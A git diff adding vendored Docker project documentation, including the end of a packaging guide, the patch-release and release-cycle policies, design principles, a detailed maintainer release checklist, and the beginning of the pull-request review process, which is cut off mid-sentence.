+If it is feasible within the constraints of your distribution, you should
+seriously consider packaging Docker as a single static binary. A good comparison
+is Busybox, which is often packaged statically as a feature to enable mass
+portability. Because of the unique way Docker operates, being similarly static
+is a "feature".
+
+To build a static Docker daemon binary, run the following command (first
+ensuring that all the necessary libraries are available in static form for
+linking - see the "Build Dependencies" section above, and the relevant lines
+within Docker's own Dockerfile that set up our official build environment):
+
+```bash
+./hack/make.sh binary
+```
+
+This will create a static binary under
+"./bundles/$VERSION/binary/docker-$VERSION", where "$VERSION" is the contents of
+the file "./VERSION". This binary is usually installed somewhere like
+"/usr/bin/docker".
+
+### Dynamic Daemon / Client-only Binary
+
+If you are only interested in a Docker client binary, you can build using:
+
+```bash
+./hack/make.sh binary-client
+```
+
+If you need to (due to distro policy, distro library availability, or for other
+reasons) create a dynamically compiled daemon binary, or if you are only
+interested in creating a client binary for Docker, use something similar to the
+following:
+
+```bash
+./hack/make.sh dynbinary-client
+```
+
+This will create "./bundles/$VERSION/dynbinary-client/docker-$VERSION", which for
+client-only builds is the important file to grab and install as appropriate.
+
+## System Dependencies
+
+### Runtime Dependencies
+
+To function properly, the Docker daemon needs the following software to be
+installed and available at runtime:
+
+* iptables version 1.4 or later
+* procps (or similar provider of a "ps" executable)
+* e2fsprogs version 1.4.12 or later (in use: mkfs.ext4, tune2fs)
+* xfsprogs (in use: mkfs.xfs)
+* XZ Utils version 4.9 or later
+* a [properly
+  mounted](https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount)
+  cgroupfs hierarchy (having a single, all-encompassing "cgroup" mount point
+  [is](https://github.com/docker/docker/issues/2683)
+  [not](https://github.com/docker/docker/issues/3485)
+  [sufficient](https://github.com/docker/docker/issues/4568))
+
+Additionally, the Docker client needs the following software to be installed and
+available at runtime:
+
+* Git version 1.7 or later
+
+### Kernel Requirements
+
+The Docker daemon has very specific kernel requirements. Most pre-packaged
+kernels already include the necessary options enabled. If you are building your
+own kernel, you will either need to discover the options necessary via trial and
+error, or check out the [Gentoo
+ebuild](https://github.com/tianon/docker-overlay/blob/master/app-emulation/docker/docker-9999.ebuild),
+in which a list is maintained (and if there are any issues or discrepancies in
+that list, please contact Tianon so they can be rectified).
+
+Note that in client mode, there are no specific kernel requirements, and that
+the client will even run on alternative platforms such as Mac OS X / Darwin.
+
+### Optional Dependencies
+
+Some of Docker's features are activated by using optional command-line flags or
+by having support for them in the kernel or userspace. A few examples include:
+
+* AUFS graph driver (requires AUFS patches/support enabled in the kernel, and at
+  least the "auplink" utility from aufs-tools)
+* BTRFS graph driver (requires BTRFS support enabled in the kernel)
+* ZFS graph driver (requires userspace zfs-utils and a corresponding kernel module)
+* Libseccomp to allow running seccomp profiles with containers
+
+## Daemon Init Script
+
+Docker expects to run as a daemon at machine startup. Your package will need to
+include a script for your distro's process supervisor of choice. Be sure to
+check out the "contrib/init" folder in case a suitable init script already
+exists (and if one does not, contact Tianon about whether it might be
+appropriate for your distro's init script to live there too!).
+
+In general, Docker should be run as root, similar to the following:
+
+```bash
+docker daemon
+```
+
+Generally, a `DOCKER_OPTS` variable of some kind is available for adding more
+flags (such as changing the graph driver to use BTRFS, switching the location of
+"/var/lib/docker", etc).
+
+## Communicate
+
+As a final note, please do feel free to reach out to Tianon at any time for
+pretty much anything. He really does love hearing from our packagers and wants
+to make sure we're not being a "hostile upstream". As should be a given, we
+appreciate the work our packagers do to make sure we have broad distribution!
diff --git a/vendor/github.com/docker/docker/project/PATCH-RELEASES.md b/vendor/github.com/docker/docker/project/PATCH-RELEASES.md
new file mode 100644
index 0000000000..548db9ab4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/PATCH-RELEASES.md
@@ -0,0 +1,68 @@
+# Docker patch (bugfix) release process
+
+Patch releases (the 'Z' in vX.Y.Z) are intended to fix major issues in a
+release. Docker open source projects follow these procedures when creating a
+patch release;
+
+After each release (both "major" (vX.Y.0) and "patch" releases (vX.Y.Z)), a
+patch release milestone (vX.Y.Z + 1) is created.
+
+The creation of a patch release milestone is no obligation to actually
+*create* a patch release. The purpose of these milestones is to collect
+issues and pull requests that can *justify* a patch release;
+
+- Any maintainer is allowed to add issues and PR's to the milestone, when
+  doing so, preferably leave a comment on the issue or PR explaining *why*
+  you think it should be considered for inclusion in a patch release.
+- Issues introduced in version vX.Y.0 get added to milestone X.Y.Z+1
+- Only *regressions* should be added. Issues *discovered* in version vX.Y.0,
+  but already present in version vX.Y-1.Z should not be added, unless
+  critical.
+- Patch releases can *only* contain bug-fixes. New features should
+  *never* be added to a patch release.
+
+The release captain of the "major" (X.Y.0) release, is also responsible for
+patch releases. The release captain, together with another maintainer, will
+review issues and PRs on the milestone, and assigns `priority/`labels. These
+review sessions take place on a weekly basis, more frequent if needed:
+
+- A P0 priority is assigned to critical issues. A maintainer *must* be
+  assigned to these issues. Maintainers should strive to fix a P0 within a week.
+- A P1 priority is assigned to major issues, but not critical. A maintainer
+  *must* be assigned to these issues.
+- P2 and P3 priorities are assigned to other issues. A maintainer can be
+  assigned.
+- Non-critical issues and PR's can be removed from the milestone. Minor
+  changes, such as typo-fixes or omissions in the documentation can be
+  considered for inclusion in a patch release.
+
+## Deciding if a patch release should be done
+
+- Only a P0 can justify to proceed with the patch release.
+- P1, P2, and P3 issues/PR's should not influence the decision, and
+  should be moved to the X.Y.Z+1 milestone, or removed from the
+  milestone.
+
+> **Note**: If the next "major" release is imminent, the release captain
+> can decide to cancel a patch release, and include the patches in the
+> upcoming major release.
+
+> **Note**: Security releases are also "patch releases", but follow
+> a different procedure. Security releases are developed in a private
+> repository, released and tested under embargo before they become
+> publicly available.
+
+## Deciding on the content of a patch release
+
+When the criteria for moving forward with a patch release are met, the release
+manager will decide on the exact content of the release.
+
+- Fixes to all P0 issues *must* be included in the release.
+- Fixes to *some* P1, P2, and P3 issues *may* be included as part of the patch
+  release depending on the severity of the issue and the risk associated with
+  the patch.
+
+Any code delivered as part of a patch release should make life easier for a
+significant amount of users with zero chance of degrading anybody's experience.
+A good rule of thumb for that is to limit cherry-picking to small patches, which
+fix well-understood issues, and which come with verifiable tests.
diff --git a/vendor/github.com/docker/docker/project/PRINCIPLES.md b/vendor/github.com/docker/docker/project/PRINCIPLES.md
new file mode 100644
index 0000000000..53f03018ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/PRINCIPLES.md
@@ -0,0 +1,19 @@
+# Docker principles
+
+In the design and development of Docker we try to follow these principles:
+
+(Work in progress)
+
+* Don't try to replace every tool. Instead, be an ingredient to improve them.
+* Less code is better.
+* Fewer components are better. Do you really need to add one more class?
+* 50 lines of straightforward, readable code is better than 10 lines of magic that nobody can understand.
+* Don't do later what you can do now. "//FIXME: refactor" is not acceptable in new code.
+* When hesitating between 2 options, choose the one that is easier to reverse.
+* No is temporary, Yes is forever. If you're not sure about a new feature, say no. You can change your mind later.
+* Containers must be portable to the greatest possible number of machines. Be suspicious of any change which makes machines less interchangeable.
+* The less moving parts in a container, the better.
+* Don't merge it unless you document it.
+* Don't document it unless you can keep it up-to-date.
+* Don't merge it unless you test it!
+* Everyone's problem is slightly different. Focus on the part that is the same for everyone, and solve that.
diff --git a/vendor/github.com/docker/docker/project/README.md b/vendor/github.com/docker/docker/project/README.md
new file mode 100644
index 0000000000..3ed68cf297
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/README.md
@@ -0,0 +1,24 @@
+# Hacking on Docker
+
+The `project/` directory holds information and tools for everyone involved in the process of creating and
+distributing Docker, specifically:
+
+## Guides
+
+If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTORS.md](../CONTRIBUTING.md).
+
+If you're a *maintainer* or aspiring maintainer, you should read [MAINTAINERS](../MAINTAINERS).
+
+If you're a *packager* or aspiring packager, you should read [PACKAGERS.md](./PACKAGERS.md).
+
+If you're a maintainer in charge of a *release*, you should read [RELEASE-CHECKLIST.md](./RELEASE-CHECKLIST.md).
+
+## Roadmap
+
+A high-level roadmap is available at [ROADMAP.md](../ROADMAP.md).
+
+
+## Build tools
+
+[hack/make.sh](../hack/make.sh) is the primary build tool for docker. It is used for compiling the official binary,
+running the test suite, and pushing releases.
diff --git a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md
new file mode 100644
index 0000000000..84848cae2b
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md
@@ -0,0 +1,518 @@
+# Release Checklist
+## A maintainer's guide to releasing Docker
+
+So you're in charge of a Docker release? Cool. Here's what to do.
+
+If your experience deviates from this document, please document the changes
+to keep it up-to-date.
+
+It is important to note that this document assumes that the git remote in your
+repository that corresponds to "https://github.com/docker/docker" is named
+"origin".  If yours is not (for example, if you've chosen to name it "upstream"
+or something similar instead), be sure to adjust the listed snippets for your
+local environment accordingly.  If you are not sure what your upstream remote is
+named, use a command like `git remote -v` to find out.
+
+If you don't have an upstream remote, you can add one easily using something
+like:
+
+```bash
+export GITHUBUSER="YOUR_GITHUB_USER"
+git remote add origin https://github.com/docker/docker.git
+git remote add $GITHUBUSER git@github.com:$GITHUBUSER/docker.git
+```
+
+### 1. Pull from master and create a release branch
+
+All releases version numbers will be of the form: vX.Y.Z  where X is the major
+version number, Y is the minor version number and Z is the patch release version number.
+
+#### Major releases
+
+The release branch name is just vX.Y because it's going to be the basis for all .Z releases.
+
+```bash
+export BASE=vX.Y
+export VERSION=vX.Y.Z
+git fetch origin
+git checkout --track origin/master
+git checkout -b release/$BASE
+```
+
+This new branch is going to be the base for the release. We need to push it to origin so we
+can track the cherry-picked changes and the version bump:
+
+```bash
+git push origin release/$BASE
+```
+
+When you have the major release branch in origin, we need to create the bump fork branch
+that we'll push to our fork:
+
+```bash
+git checkout -b bump_$VERSION
+```
+
+#### Patch releases
+
+If we have the release branch in origin, we can create the forked bump branch from it directly:
+
+```bash
+export VERSION=vX.Y.Z
+export PATCH=vX.Y.Z+1
+git fetch origin
+git checkout --track origin/release/$BASE
+git checkout -b bump_$PATCH
+```
+
+We cherry-pick only the commits we want into the bump branch:
+
+```bash
+# get the commits ids we want to cherry-pick
+git log
+# cherry-pick the commits starting from the oldest one, without including merge commits
+git cherry-pick -s -x <commit-id>
+git cherry-pick -s -x <commit-id>
+...
+```
+
+### 2. Update the VERSION files and API version on master
+
+We don't want to stop contributions to master just because we are releasing.
+So, after the release branch is up, we bump the VERSION and API version to mark
+the start of the "next" release.
+
+#### 2.1 Update the VERSION files
+
+Update the content of the `VERSION` file to be the next minor (incrementing Y)
+and add the `-dev` suffix. For example, after the release branch for 1.5.0 is
+created, the `VERSION` file gets updated to `1.6.0-dev` (as in "1.6.0 in the
+making").
+
+#### 2.2 Update API version on master
+
+We don't want API changes to go to the now frozen API version. Create a new
+entry in `docs/reference/api/` by copying the latest and bumping the version
+number (in both the file's name and content), and submit this in a PR against
+master.
+
+### 3. Update CHANGELOG.md
+
+You can run this command for reference with git 2.0:
+
+```bash
+git fetch --tags
+LAST_VERSION=$(git tag -l --sort=-version:refname "v*" | grep -E 'v[0-9\.]+$' | head -1)
+git log --stat $LAST_VERSION..bump_$VERSION
+```
+
+If you don't have git 2.0 but have a sort command that supports `-V`:
+```bash
+git fetch --tags
+LAST_VERSION=$(git tag -l | grep -E 'v[0-9\.]+$' | sort -rV | head -1)
+git log --stat $LAST_VERSION..bump_$VERSION
+```
+
+If releasing a major version (X or Y increased in vX.Y.Z), simply listing notable user-facing features is sufficient.
+```markdown
+#### Notable features since <last major version>
+* New docker command to do something useful
+* Engine API change (deprecating old version)
+* Performance improvements in some usecases
+* ...
+```
+
+For minor releases (only Z increases in vX.Y.Z), provide a list of user-facing changes.
+Each change should be listed under a category heading formatted as `#### CATEGORY`.
+
+`CATEGORY` should describe which part of the project is affected.
+  Valid categories are:
+  * Builder
+  * Documentation
+  * Hack
+  * Packaging
+  * Engine API
+  * Runtime
+  * Other (please use this category sparingly)
+
+Each change should be formatted as `BULLET DESCRIPTION`, given:
+
+* BULLET: either `-`, `+` or `*`, to indicate a bugfix, new feature or
+  upgrade, respectively.
+
+* DESCRIPTION: a concise description of the change that is relevant to the
+  end-user, using the present tense. Changes should be described in terms
+  of how they affect the user, for example "Add new feature X which allows Y",
+  "Fix bug which caused X", "Increase performance of Y".
+
+EXAMPLES:
+
+```markdown
+## 0.3.6 (1995-12-25)
+
+#### Builder
+
++ 'docker build -t FOO .' applies the tag FOO to the newly built image
+
+#### Engine API
+
+- Fix a bug in the optional unix socket transport
+
+#### Runtime
+
+* Improve detection of kernel version
+```
+
+If you need a list of contributors between the last major release and the
+current bump branch, use something like:
+```bash
+git log --format='%aN <%aE>' v0.7.0...bump_v0.8.0 | sort -uf
+```
+Obviously, you'll need to adjust version numbers as necessary.  If you just need
+a count, add a simple `| wc -l`.
+
+### 4. Change the contents of the VERSION file
+
+Before the big thing, you'll want to make successive release candidates and get
+people to test. The release candidate number `N` should be part of the version:
+
+```bash
+export RC_VERSION=${VERSION}-rcN
+echo ${RC_VERSION#v} > VERSION
+```
+
+### 5. Test the docs
+
+Make sure that your tree includes documentation for any modified or
+new features, syntax or semantic changes.
+
+To test locally:
+
+```bash
+make docs
+```
+
+To make a shared test at https://beta-docs.docker.io:
+
+(You will need the `awsconfig` file added to the `docs/` dir)
+
+```bash
+make AWS_S3_BUCKET=beta-docs.docker.io BUILD_ROOT=yes docs-release
+```
+
+### 6. Commit and create a pull request to the "release" branch
+
+```bash
+git add VERSION CHANGELOG.md
+git commit -m "Bump version to $VERSION"
+git push $GITHUBUSER bump_$VERSION
+echo "https://github.com/$GITHUBUSER/docker/compare/docker:release/$BASE...$GITHUBUSER:bump_$VERSION?expand=1"
+```
+
+That last command will give you the proper link to visit to ensure that you
+open the PR against the "release" branch instead of accidentally against
+"master" (like so many brave souls before you already have).
+
+### 7. Create a PR to update the AUTHORS file for the release
+
+Update the AUTHORS file, by running the `hack/generate-authors.sh` on the
+release branch. To prevent duplicate entries, you may need to update the
+`.mailmap` file accordingly.
+
+### 8. Build release candidate rpms and debs
+
+**NOTE**: It will be a lot faster if you pass a different graphdriver with
+`DOCKER_GRAPHDRIVER` than `vfs`.
+
+```bash
+docker build -t docker .
+docker run \
+    --rm -t --privileged \
+    -e DOCKER_GRAPHDRIVER=aufs \
+    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
+    docker \
+    hack/make.sh binary build-deb build-rpm
+```
+
+### 9. Publish release candidate rpms and debs
+
+With the rpms and debs you built from the last step you can release them on the
+same server, or ideally, move them to a dedicated release box via scp into
+another docker/docker directory in bundles. This next step assumes you have
+a checkout of the docker source code at the same commit you used to build, with
+the artifacts from the last step in `bundles`.
+
+**NOTE:** If you put a space before the command your `.bash_history` will not
+save it. (for the `GPG_PASSPHRASE`).
+
+```bash
+docker build -t docker .
+docker run --rm -it --privileged \
+    -v /volumes/repos:/volumes/repos \
+    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
+    -v $HOME/.gnupg:/root/.gnupg \
+    -e DOCKER_RELEASE_DIR=/volumes/repos \
+    -e GPG_PASSPHRASE \
+    -e KEEPBUNDLE=1 \
+    docker \
+    hack/make.sh release-deb release-rpm sign-repos generate-index-listing
+```
+
+### 10. Upload the changed repos to wherever you host
+
+For example, above we bind mounted `/volumes/repos` as the storage for
+`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with
+a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with
+a s3 bucket for the yum repo.
+
+### 11. Publish release candidate binaries
+
+To run this you will need access to the release credentials. Get them from the
+Core maintainers.
+
+```bash
+docker build -t docker .
+
+# static binaries are still pushed to s3
+docker run \
+    -e AWS_S3_BUCKET=test.docker.com \
+    -e AWS_ACCESS_KEY_ID \
+    -e AWS_SECRET_ACCESS_KEY \
+    -e AWS_DEFAULT_REGION \
+    -i -t --privileged \
+    docker \
+    hack/release.sh
+```
+
+It will run the test suite, build the binaries and upload to the specified bucket,
+so this is a good time to verify that you're running against **test**.docker.com.
+
+### 12. Purge the cache!
+
+After the binaries are uploaded to test.docker.com and the packages are on
+apt.dockerproject.org and yum.dockerproject.org, make sure
+they get tested in both Ubuntu and Debian for any obvious installation
+issues or runtime issues.
+
+If everything looks good, it's time to create a git tag for this candidate:
+
+```bash
+git tag -a $RC_VERSION -m $RC_VERSION bump_$VERSION
+git push origin $RC_VERSION
+```
+
+Announcing on multiple medias is the best way to get some help testing! An easy
+way to get some useful links for sharing:
+
+```bash
+echo "Ubuntu/Debian: curl -sSL https://test.docker.com/ | sh"
+echo "Linux 64bit binary: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}"
+echo "Darwin/OSX 64bit client binary: https://test.docker.com/builds/Darwin/x86_64/docker-${VERSION#v}"
+echo "Linux 64bit tgz: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}.tgz"
+echo "Windows 64bit client binary: https://test.docker.com/builds/Windows/x86_64/docker-${VERSION#v}.exe"
+echo "Windows 32bit client binary: https://test.docker.com/builds/Windows/i386/docker-${VERSION#v}.exe"
+```
+
+We recommend announcing the release candidate on:
+
+- IRC on #docker, #docker-dev, #docker-maintainers
+- In a comment on the pull request to notify subscribed people on GitHub
+- The [docker-dev](https://groups.google.com/forum/#!forum/docker-dev) group
+- The [docker-maintainers](https://groups.google.com/a/dockerproject.org/forum/#!forum/maintainers) group
+- Any social media that can bring some attention to the release candidate
+
+### 13. Iterate on successive release candidates
+
+Spend several days along with the community explicitly investing time and
+resources to try and break Docker in every possible way, documenting any
+findings pertinent to the release.  This time should be spent testing and
+finding ways in which the release might have caused various features or upgrade
+environments to have issues, not coding.  During this time, the release is in
+code freeze, and any additional code changes will be pushed out to the next
+release.
+
+It should include various levels of breaking Docker, beyond just using Docker
+by the book.
+
+Any issues found may still remain issues for this release, but they should be
+documented and give appropriate warnings.
+
+During this phase, the `bump_$VERSION` branch will keep evolving as you will
+produce new release candidates. The frequency of new candidates is up to the
+release manager: use your best judgement taking into account the severity of
+reported issues, testers availability, and time to scheduled release date.
+
+Each time you'll want to produce a new release candidate, you will start by
+adding commits to the branch, usually by cherry-picking from master:
+
+```bash
+git cherry-pick -s -x -m0 <commit_id>
+```
+
+You want your "bump commit" (the one that updates the CHANGELOG and VERSION
+files) to remain on top, so you'll have to `git rebase -i` to bring it back up.
+
+Now that your bump commit is back on top, you will need to update the CHANGELOG
+file (if appropriate for this particular release candidate), and update the
+VERSION file to increment the RC number:
+
+```bash
+export RC_VERSION=$VERSION-rcN
+echo $RC_VERSION > VERSION
+```
+
+You can now amend your last commit and update the bump branch:
+
+```bash
+git commit --amend
+git push -f $GITHUBUSER bump_$VERSION
+```
+
+Repeat step 6 to tag the code, publish new binaries, announce availability, and
+get help testing.
+
+### 14. Finalize the bump branch
+
+When you're happy with the quality of a release candidate, you can move on and
+create the real thing.
+
+You will first have to amend the "bump commit" to drop the release candidate
+suffix in the VERSION file:
+
+```bash
+echo $VERSION > VERSION
+git add VERSION
+git commit --amend
+```
+
+You will then repeat step 6 to publish the binaries to test
+
+### 15. Get 2 other maintainers to validate the pull request
+
+### 16. Build final rpms and debs
+
+```bash
+docker build -t docker .
+docker run \
+    --rm -t --privileged \
+    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
+    docker \
+    hack/make.sh binary build-deb build-rpm
+```
+
+### 17. Publish final rpms and debs
+
+With the rpms and debs you built from the last step you can release them on the
+same server, or ideally, move them to a dedicated release box via scp into
+another docker/docker directory in bundles. This next step assumes you have
+a checkout of the docker source code at the same commit you used to build, with
+the artifacts from the last step in `bundles`.
+
+**NOTE:** If you put a space before the command your `.bash_history` will not
+save it. (for the `GPG_PASSPHRASE`).
+
+```bash
+docker build -t docker .
+docker run --rm -it --privileged \
+    -v /volumes/repos:/volumes/repos \
+    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
+    -v $HOME/.gnupg:/root/.gnupg \
+    -e DOCKER_RELEASE_DIR=/volumes/repos \
+    -e GPG_PASSPHRASE \
+    -e KEEPBUNDLE=1 \
+    docker \
+    hack/make.sh release-deb release-rpm sign-repos generate-index-listing
+```
+
+### 18. Upload the changed repos to wherever you host
+
+For example, above we bind mounted `/volumes/repos` as the storage for
+`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with
+a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with
+a s3 bucket for the yum repo.
+
+### 19. Publish final binaries
+
+Once they're tested and reasonably believed to be working, run against
+get.docker.com:
+
+```bash
+docker build -t docker .
+# static binaries are still pushed to s3
+docker run \
+    -e AWS_S3_BUCKET=get.docker.com \
+    -e AWS_ACCESS_KEY_ID \
+    -e AWS_SECRET_ACCESS_KEY \
+    -e AWS_DEFAULT_REGION \
+    -i -t --privileged \
+    docker \
+    hack/release.sh
+```
+
+### 20. Purge the cache!
+
+### 21. Apply tag and create release
+
+It's very important that we don't make the tag until after the official
+release is uploaded to get.docker.com!
+
+```bash
+git tag -a $VERSION -m $VERSION bump_$VERSION
+git push origin $VERSION
+```
+
+Once the tag is pushed, go to GitHub and create a [new release](https://github.com/docker/docker/releases/new).
+If the tag is for an RC make sure you check `This is a pre-release` at the bottom of the form.
+
+Select the tag that you just pushed as the version and paste the changelog in the description of the release.
+You can see examples in this two links:
+
+https://github.com/docker/docker/releases/tag/v1.8.0
+https://github.com/docker/docker/releases/tag/v1.8.0-rc3
+
+### 22. Go to github to merge the `bump_$VERSION` branch into release
+
+Don't forget to push that pretty blue button to delete the leftover
+branch afterwards!
+
+### 23. Update the docs branch
+
+You will need to point the docs branch to the newly created release tag:
+
+```bash
+git checkout origin/docs
+git reset --hard origin/$VERSION
+git push -f origin docs
+```
+
+The docs will appear on https://docs.docker.com/ (though there may be cached
+versions, so its worth checking http://docs.docker.com.s3-website-us-east-1.amazonaws.com/).
+For more information about documentation releases, see `docs/README.md`.
+
+Note that the new docs will not appear live on the site until the cache (a complex,
+distributed CDN system) is flushed. The `make docs-release` command will do this
+_if_ the `DISTRIBUTION_ID` is set correctly - this will take at least 15 minutes to run
+and you can check its progress with the CDN Cloudfront Chrome addon.
+
+### 24. Create a new pull request to merge your bump commit back into master
+
+```bash
+git checkout master
+git fetch
+git reset --hard origin/master
+git cherry-pick -s -x $VERSION
+git push $GITHUBUSER merge_release_$VERSION
+echo "https://github.com/$GITHUBUSER/docker/compare/docker:master...$GITHUBUSER:merge_release_$VERSION?expand=1"
+```
+
+Again, get two maintainers to validate, then merge, then push that pretty
+blue button to delete your branch.
+
+### 25. Rejoice and Evangelize!
+
+Congratulations! You're done.
+
+Go forth and announce the glad tidings of the new release in `#docker`,
+`#docker-dev`, on the [dev mailing list](https://groups.google.com/forum/#!forum/docker-dev),
+the [announce mailing list](https://groups.google.com/forum/#!forum/docker-announce),
+and on Twitter!
diff --git a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md
new file mode 100644
index 0000000000..d764e9d007
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md
@@ -0,0 +1,78 @@
+# Docker Release Process
+
+This document describes how the Docker project is released. The Docker project
+release process targets the Engine, Compose, Kitematic, Machine, Swarm,
+Distribution, Notary and their underlying dependencies (libnetwork, libkv,
+etc...).
+
+Step-by-step technical details of the process are described in 
+[RELEASE-CHECKLIST.md](https://github.com/docker/docker/blob/master/project/RELEASE-CHECKLIST.md).
+
+## Release cycle
+
+The Docker project follows a **time-based release cycle** and ships every nine
+weeks. A release cycle starts the same day the previous release cycle ends.
+
+The first six weeks of the cycle are dedicated to development and review. During
+this phase, new features and bugfixes submitted to any of the projects are
+**eligible** to be shipped as part of the next release. No changeset submitted
+during this period is however guaranteed to be merged for the current release
+cycle.
+
+## The freeze period
+
+Six weeks after the beginning of the cycle, the codebase is officially frozen
+and the codebase reaches a state close to the final release. A Release Candidate
+(RC) gets created at the same time. The freeze period is used to find bugs and
+get feedback on the state of the RC before the release.
+
+During this freeze period, while the `master` branch will continue its normal
+development cycle, no new features are accepted into the RC. As bugs are fixed
+in `master` the release owner will selectively 'cherry-pick' critical ones to
+be included into the RC. As the RC changes, new ones are made available for the
+community to test and review.
+
+This period lasts for three weeks.
+
+## How to maximize chances of being merged before the freeze date?
+
+First of all, there is never a guarantee that a specific changeset is going to
+be merged. However there are different actions to follow to maximize the chances
+for a changeset to be merged:
+
+- The team gives priority to review the PRs aligned with the Roadmap (usually
+defined by a ROADMAP.md file at the root of the repository).
+- The earlier a PR is opened, the more time the maintainers have to review. For
+example, if a PR is opened the day before the freeze date, it’s very unlikely
+that it will be merged for the release.
+- Constant communication with the maintainers (mailing-list, IRC, Github issues,
+etc.) allows to get early feedback on the design before getting into the
+implementation, which usually reduces the time needed to discuss a changeset.
+- If the code is commented, fully tested and by extension follows every single
+rules defined by the [CONTRIBUTING guide](
+https://github.com/docker/docker/blob/master/CONTRIBUTING.md), this will help
+the maintainers by speeding up the review.
+
+## The release
+
+At the end of the freeze (nine weeks after the start of the cycle), all the
+projects are released together.
+
+```
+                                        Codebase              Release
+Start of                                is frozen             (end of the
+the Cycle                               (7th week)            9th week)
++---------------------------------------+---------------------+
+|                                       |                     |
+|           Development phase           |    Freeze phase     |
+|                                       |                     |
++---------------------------------------+---------------------+
+                   6 weeks                      3 weeks
+<---------------------------------------><-------------------->
+```
+
+## Exceptions
+
+If a critical issue is found at the end of the freeze period and more time is
+needed to address it, the release will be pushed back. When a release gets
+pushed back, the next release cycle gets delayed as well.
diff --git a/vendor/github.com/docker/docker/project/REVIEWING.md b/vendor/github.com/docker/docker/project/REVIEWING.md
new file mode 100644
index 0000000000..51ef4c59de
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/REVIEWING.md
@@ -0,0 +1,246 @@
+# Pull request reviewing process
+
+## Labels
+
+Labels are carefully picked to optimize for:
+
+ - Readability: maintainers must immediately know the state of a PR
+ - Filtering simplicity: different labels represent many different aspects of
+   the reviewing work, and can even be targeted at different maintainers groups.
+
+A pull request should only be attributed labels documented in this section: other labels that may
+exist on the repository should apply to issues.
+
+### DCO labels
+
+ * `dco/no`: automatically set by a bot when one of the commits lacks proper signature
+
+### Status labels
+
+ * `status/0-triage`
+ * `status/1-design-review`
+ * `status/2-code-review`
+ * `status/3-docs-review`
+ * `status/4-ready-to-merge`
+
+Special status labels:
+
+ * `status/failing-ci`: indicates that the PR in its current state fails the test suite
+ * `status/needs-attention`: calls for a collective discussion during a review session
+
+### Impact labels (apply to merged pull requests)
+
+ * `impact/api`
+ * `impact/changelog`
+ * `impact/cli`
+ * `impact/deprecation`
+ * `impact/distribution`
+ * `impact/dockerfile`
+
+### Process labels (apply to merged pull requests)
+
+Process labels are to assist in preparing (patch) releases. These labels should only be used for pull requests.
+
+Label                           | Use for
+------------------------------- | -------------------------------------------------------------------------
+`process/cherry-pick`           | PRs that should be cherry-picked in the bump/release branch. These pull-requests must also be assigned to a milestone.
+`process/cherry-picked`         | PRs that have been cherry-picked. This label is helpful to find PR's that have been added to release-candidates, and to update the change log
+`process/docs-cherry-pick`      | PRs that should be cherry-picked in the docs branch. Only apply this label for changes that apply to the *current* release, and generic documentation fixes, such as Markdown and spelling fixes.
+`process/docs-cherry-picked`    | PRs that have been cherry-picked in the docs branch
+`process/merge-to-master`       | PRs that are opened directly on the bump/release branch, but also need to be merged back to "master"
+`process/merged-to-master`      | PRs that have been merged back to "master"
+
+
+## Workflow
+
+An opened pull request can be in 1 of 5 distinct states, for each of which there is a corresponding
+label that needs to be applied.
+
+### Triage - `status/0-triage`
+
+Maintainers are expected to triage new incoming pull requests by removing the `status/0-triage`
+label and adding the correct labels (e.g. `status/1-design-review`) before any other interaction
+with the PR. The starting label may potentially skip some steps depending on the kind of pull
+request: use your best judgement.
+
+Maintainers should perform an initial, high-level, overview of the pull request before moving it to
+the next appropriate stage:
+
+ - Has DCO
+ - Contains sufficient justification (e.g., usecases) for the proposed change
+ - References the Github issue it fixes (if any) in the commit or the first Github comment
+
+Possible transitions from this state:
+
+ * Close: e.g., unresponsive contributor without DCO
+ * `status/1-design-review`: general case
+ * `status/2-code-review`: e.g. trivial bugfix
+ * `status/3-docs-review`: non-proposal documentation-only change
+
+### Design review - `status/1-design-review`
+
+Maintainers are expected to comment on the design of the pull request.  Review of documentation is
+expected only in the context of design validation, not for stylistic changes.
+
+Ideally, documentation should reflect the expected behavior of the code.  No code review should
+take place in this step.
+
+There are no strict rules on the way a design is validated: we usually aim for a consensus,
+although a single maintainer approval is often sufficient for obviously reasonable changes. In
+general, strong disagreement expressed by any of the maintainers should not be taken lightly.
+
+Once design is approved, a maintainer should make sure to remove this label and add the next one.
+
+Possible transitions from this state:
+
+ * Close: design rejected
+ * `status/2-code-review`: general case
+ * `status/3-docs-review`: proposals with only documentation changes
+
+### Code review - `status/2-code-review`
+
+Maintainers are expected to review the code and ensure that it is good quality and in accordance
+with the documentation in the PR.
+
+New testcases are expected to be added. Ideally, those testcases should fail when the new code is
+absent, and pass when present. The testcases should strive to test as many variants, code paths, as
+possible to ensure maximum coverage.
+
+Changes to code must be reviewed and approved (LGTM'd) by a minimum of two code maintainers. When
+the author of a PR is a maintainer, he still needs the approval of two other maintainers.
+
+Once code is approved according to the rules of the subsystem, a maintainer should make sure to
+remove this label and add the next one. If documentation is absent but expected, maintainers should
+ask for documentation and move to status `status/3-docs-review` for docs maintainer to follow.
+
+Possible transitions from this state:
+
+ * Close
+ * `status/1-design-review`: new design concerns are raised
+ * `status/3-docs-review`: general case
+ * `status/4-ready-to-merge`: change not impacting documentation
+
+### Docs review - `status/3-docs-review`
+
+Maintainers are expected to review the documentation in its bigger context, ensuring consistency,
